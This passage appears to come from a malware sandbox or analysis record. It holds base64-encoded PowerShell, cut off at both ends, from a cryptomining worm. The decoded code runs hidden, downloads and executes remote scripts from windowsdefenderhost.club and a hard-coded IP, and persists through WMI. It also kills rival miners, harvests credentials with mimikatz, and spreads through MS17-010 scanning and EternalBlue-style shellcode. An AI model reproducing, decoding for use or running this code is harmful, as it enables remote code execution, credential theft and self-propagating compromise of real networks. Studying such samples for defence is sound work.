AG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAG